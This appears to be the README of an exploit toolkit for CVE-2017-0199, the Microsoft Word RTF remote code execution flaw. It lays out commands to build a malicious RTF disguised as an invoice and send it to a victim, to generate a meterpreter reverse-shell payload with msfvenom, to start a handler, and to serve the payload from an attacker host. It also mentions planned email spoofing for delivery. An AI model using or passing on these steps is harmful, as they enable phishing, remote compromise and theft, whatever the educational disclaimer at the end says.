adb

1. Exploit toolkit CVE-2017-0199 - v2.0
2. Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.
3.  
4. Video tutorial
5. https://youtu.be/42LjG7bAvpg
6.  
7. Release note:
8. Introduced following capabilities to the script
9.  
10. - Generate Malicious RTF file using toolkit
11. - Run toolkit in an exploitation mode as tiny HTA + Web server
12. Version: Python version 2.7.13
13.  
14. Future release:
15. Working on following feature
16.  
17. - Automatically send generated malicious RTF to victim using email spoofing
18. Example:
19. Step 1: Generate malicious RTF file using following command and send it to victim
20.  
21. Syntax:
22.  
23. # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
24.  
25. Example:
26.  
27. # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
28. Step 2 (Optional, if using MSF Payload) : Generate metasploit payload and start handler
29.  
30. Example:
31.  
32. Generate Payload:
33.  
34. # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
35.  
36. Start Handler:
37.  
38. # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
39. Step 3: Start toolkit in exploitation mode to deliver payloads
40.  
41. Syntax:
42.  
43. # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
44.  
45. Example:
46.  
47. # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
48. Command line arguments:
49. # python cve-2017-0199_toolkit.py -h
50.  
51. This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
52.  
53. Modes:
54.  
55. -M gen Generate Malicious RTF file only
56.  
57. Generate malicious RTF file:
58.  
59. -w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
60.  
61. -u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
62.  
63. For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
64.  
65. will be requested once victim will open malicious RTF file.
66. -M exp Start exploitation mode
67.  
68. Exploitation:
69.  
70. -p <TCP port:Default 80> Local port number.
71.  
72. -e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
73.  
74. -l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
75. Disclaimer
76. This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility.